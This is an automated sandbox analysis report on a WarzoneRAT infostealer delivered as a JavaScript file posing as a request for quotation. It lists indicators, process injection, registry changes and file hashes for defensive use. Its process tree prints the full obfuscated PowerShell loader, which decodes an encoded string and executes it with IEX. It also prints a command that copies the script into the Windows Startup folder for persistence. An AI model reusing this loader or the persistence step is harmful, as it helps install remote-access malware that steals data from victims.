warzonerat | d74fcb65f2b575718c632458f849fdd5a3775092b4e54744a4384e15c67646cb

Analysis

max time kernel
136s
max time network
152s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
29-11-2022 16:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ scope of requirements.js
Size

2KB
MD5

84ae648af28a2f5acd3c67fabde24615
SHA1

45a9a2ddd9b5d8fedd6c5767cdb0bafb95c6d72b
SHA256

c3db9d461440908e3278fda059adb00e9f546a3dd8dd38f80a6cee93372ae15d
SHA512

7262173a3d69a54489b57087380e056b4f789343e9e0fe58efc5d0efbe1f166df44360bf1f9a2dba96b04afc5cac272cb3b262bd1eeda1c347131fa2db38468d

Score

10^/10

warzonerat infostealer rat

Malware Config

Signatures

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/220-224-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral2/memory/220-225-0x000000000040B556-mapping.dmp	warzonerat
behavioral2/memory/220-266-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral2/memory/220-271-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral2/memory/220-293-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

25 3804 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exe

pid process

3804 powershell.exe
3804 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3804 set thread context of 220 3804 powershell.exe InstallUtil.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
25	3804	powershell.exe

pid	process
3804	powershell.exe
3804	powershell.exe

description	pid	process	target process
PID 3804 set thread context of 220	3804	powershell.exe	InstallUtil.exe

Modifies Internet Explorer settings 1 TTPs 51 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2093532182"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999576"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376508065"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000080eba15cfdc81d40b112d411079aaf770000000002000000000010660000000100002000000009b1dc0c6ae99c2a2be87f6cc1056800bfadf8ae372459df24b70c606a5e1479000000000e8000000002000020000000ab312bedd8822109f24b7518a2447c1501ebc430768f1ffcd2b497bd2e8fcf0e200000003c4283edb0196e1028d8274f3ace003d13e9bdb8f5381c644e76db7d549fb74f40000000a517a74339708cc9f77f1c232fdff07bc8e132211f0e42eec26d86593ce63c08c7fee773a1a76775356d5efa6df8edbc44d2db984845db2ba8ef4569eae6ae04	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz!	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "376556650"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30999576"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999576"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999576"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2292282423"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A05A712A-700B-11ED-A973-6AE0918FCC10} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b06b38781804d901	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1996969520"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "376524659"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1996969520"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate	iexplore.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3776	powershell.exe
3776	powershell.exe
3776	powershell.exe
4556	powershell.exe
4556	powershell.exe
4556	powershell.exe
4700	powershell.exe
3804	powershell.exe
4700	powershell.exe
3804	powershell.exe
4700	powershell.exe
3804	powershell.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

powershell.exe

pid process

4556 powershell.exe

pid	process
4556	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeIncreaseQuotaPrivilege	3804	powershell.exe
Token: SeSecurityPrivilege	3804	powershell.exe
Token: SeTakeOwnershipPrivilege	3804	powershell.exe
Token: SeLoadDriverPrivilege	3804	powershell.exe
Token: SeSystemProfilePrivilege	3804	powershell.exe
Token: SeSystemtimePrivilege	3804	powershell.exe
Token: SeProfSingleProcessPrivilege	3804	powershell.exe
Token: SeIncBasePriorityPrivilege	3804	powershell.exe
Token: SeCreatePagefilePrivilege	3804	powershell.exe
Token: SeBackupPrivilege	3804	powershell.exe
Token: SeRestorePrivilege	3804	powershell.exe
Token: SeShutdownPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeSystemEnvironmentPrivilege	3804	powershell.exe
Token: SeRemoteShutdownPrivilege	3804	powershell.exe
Token: SeUndockPrivilege	3804	powershell.exe
Token: SeManageVolumePrivilege	3804	powershell.exe
Token: 33	3804	powershell.exe
Token: 34	3804	powershell.exe
Token: 35	3804	powershell.exe
Token: 36	3804	powershell.exe
Token: SeIncreaseQuotaPrivilege	3804	powershell.exe
Token: SeSecurityPrivilege	3804	powershell.exe
Token: SeTakeOwnershipPrivilege	3804	powershell.exe
Token: SeLoadDriverPrivilege	3804	powershell.exe
Token: SeSystemProfilePrivilege	3804	powershell.exe
Token: SeSystemtimePrivilege	3804	powershell.exe
Token: SeProfSingleProcessPrivilege	3804	powershell.exe
Token: SeIncBasePriorityPrivilege	3804	powershell.exe
Token: SeCreatePagefilePrivilege	3804	powershell.exe
Token: SeBackupPrivilege	3804	powershell.exe
Token: SeRestorePrivilege	3804	powershell.exe
Token: SeShutdownPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeSystemEnvironmentPrivilege	3804	powershell.exe
Token: SeRemoteShutdownPrivilege	3804	powershell.exe
Token: SeUndockPrivilege	3804	powershell.exe
Token: SeManageVolumePrivilege	3804	powershell.exe
Token: 33	3804	powershell.exe
Token: 34	3804	powershell.exe
Token: 35	3804	powershell.exe
Token: 36	3804	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

4408 iexplore.exe
4408 iexplore.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid process

4408 iexplore.exe
4408 iexplore.exe
2168 IEXPLORE.EXE
2168 IEXPLORE.EXE
4408 iexplore.exe
4408 iexplore.exe
3436 IEXPLORE.EXE
3436 IEXPLORE.EXE

pid	process
4408	iexplore.exe
4408	iexplore.exe

pid	process
4408	iexplore.exe
4408	iexplore.exe
2168	IEXPLORE.EXE
2168	IEXPLORE.EXE
4408	iexplore.exe
4408	iexplore.exe
3436	IEXPLORE.EXE
3436	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

iexplore.exewscript.exepowershell.exe

description	pid	process	target process
PID 4408 wrote to memory of 2168	4408	iexplore.exe	IEXPLORE.EXE
PID 4408 wrote to memory of 2168	4408	iexplore.exe	IEXPLORE.EXE
PID 4408 wrote to memory of 2168	4408	iexplore.exe	IEXPLORE.EXE
PID 1896 wrote to memory of 3776	1896	wscript.exe	powershell.exe
PID 1896 wrote to memory of 3776	1896	wscript.exe	powershell.exe
PID 1896 wrote to memory of 4556	1896	wscript.exe	powershell.exe
PID 1896 wrote to memory of 4556	1896	wscript.exe	powershell.exe
PID 4408 wrote to memory of 3436	4408	iexplore.exe	IEXPLORE.EXE
PID 4408 wrote to memory of 3436	4408	iexplore.exe	IEXPLORE.EXE
PID 4408 wrote to memory of 3436	4408	iexplore.exe	IEXPLORE.EXE
PID 1896 wrote to memory of 3804	1896	wscript.exe	powershell.exe
PID 1896 wrote to memory of 3804	1896	wscript.exe	powershell.exe
PID 1896 wrote to memory of 4700	1896	wscript.exe	powershell.exe
PID 1896 wrote to memory of 4700	1896	wscript.exe	powershell.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe
PID 3804 wrote to memory of 220	3804	powershell.exe	InstallUtil.exe

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Can’t reach this page Can’t reach this page Make sure the web address http://104.223.67.151 is correct Search for this site on Bing Refresh the page Check that all network cables are plugged in. Verify that airplane mode is turned off. Make sure your wireless switch is turned on. See if you can connect to mobile broadband. Restart your router. More information <id id="moreInformation">More information</id> This website could not be found. Error Code: INET_E_RESOURCE_NOT_FOUND Fix connection problems
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115111,51115555,55151111,51115511,51151551,51155151,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4408

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4408 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2168

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4408 CREDAT:82948 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3436

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize
471B

MD5
bd4f3cb3175ff83bbc2c827705950a60

SHA1
9d940539de8317a8a6444559d9fc9f190dd9f80b

SHA256
ff821119d7d2bf9d795503ed63996c81611b84cdcdacac943da9a9ae2d0d2384

SHA512
02b99cb5a7e2cf6004fd010c5718f85830aca7b6f43b5ed929d2df8ca4209a29cfd9e54280a35392b2617ab58e578c097834ce24e9baa8b226c6181c64c0d377

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize
434B

MD5
25f14fcd5bf80289638131015c08bf74

SHA1
18cf8193580e79f78911a6025f9c60cff394fa0f

SHA256
22106512f202b8ad4c7fc0746472247981cdb29a573608ef26f64dec8b3d1b0d

SHA512
10f868712e9e1a5e6d829e9cd691b6d55a880801ec05cc8b649727e9c568e05f41bbcfed3f581453c9cd55f61686662b7fe72a4d6e2d91a59440fbeb277b3276

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\HNIGXSTQ.cookie
Filesize
615B

MD5
aee2ab2d6df3e92cc02096911c5662ff

SHA1
cf586f56843f31fc29e4980bd7280f0b79008301

SHA256
b3059e748e4a4fb313e6cc311a0a878ac47077a0052b3ebedde0b6ae0e874831

SHA512
233e759351baf4ae695931ac50b89b3d078402f3602494c74c24149c4faef22a1ec80a5b3f7b75ca76d2853f707c2f6d98d536a3a2249d5cdd12f7ee39f6f3b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\I22GFQYG.cookie
Filesize
615B

MD5
37b16890c29f3b3b50467f02006f78ef

SHA1
e880b90d023761af3901ef42cd0e4c419eff2420

SHA256
7e0d44960fad415c90c29409b1730a1adf4dcea14d351a37f05fb2e0ef768083

SHA512
db1553c34368c8d020cd4eb5caf0c9740fdc72a8d6a67dbe321f9529f4ebafa8611b0cae8360a25e01afc31eefd8b72f6d9dae6c86e7788ce641a3b63b83805f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3648db9dd6b6aeb1e7993a505c9107bd

SHA1
904ac2e342f8150eb3a194073f8f3a3cec75c60c

SHA256
73ecbd557bada29a0fa404beaec32c7f72fd2ffc284608499704af5494cffa54

SHA512
de1ee1ed2273a09df0e54efa887f756d8ce93d05d37e1258bc4763a3abb754773f6e8664d53f6e30c993d4bbf3ea31ee69d2e1cc3e0c6d55a075daf3bcf46748

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e3b81d07ed235577c632029331c73e24

SHA1
8f35a56e5d90292f75dc13abb02946b3af1c2144

SHA256
08d5e8ebf07bb8d89c0191729d3ba498c08f9997cd8944579db113aa6b7f6151

SHA512
30db8f12c81914ed41fb4a00420e8ab1685e69d29cfabd5351cd6f3f4a508f72cd66c12777afc306d71cc537e72ec4dbe2d1cc7d53a608074fd2f854ccdca363

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6ac04c27e87271fcec9529ce9f316428

SHA1
5dc11338a99ddd2c218d4bd7557e18e2b85082eb

SHA256
a304d35bd8993011e799d7ead7a4b70018ee954560a146887b16e184e2566e52

SHA512
9cad7b2de80a6dc1fef05a162e3d9bda7d2009801375181e779befa1b7766569084348abc2711f854e0b8c741a7995d05b68e63ed92b235d8a9772e08cc2b13a

Download Submit
\Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll
Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
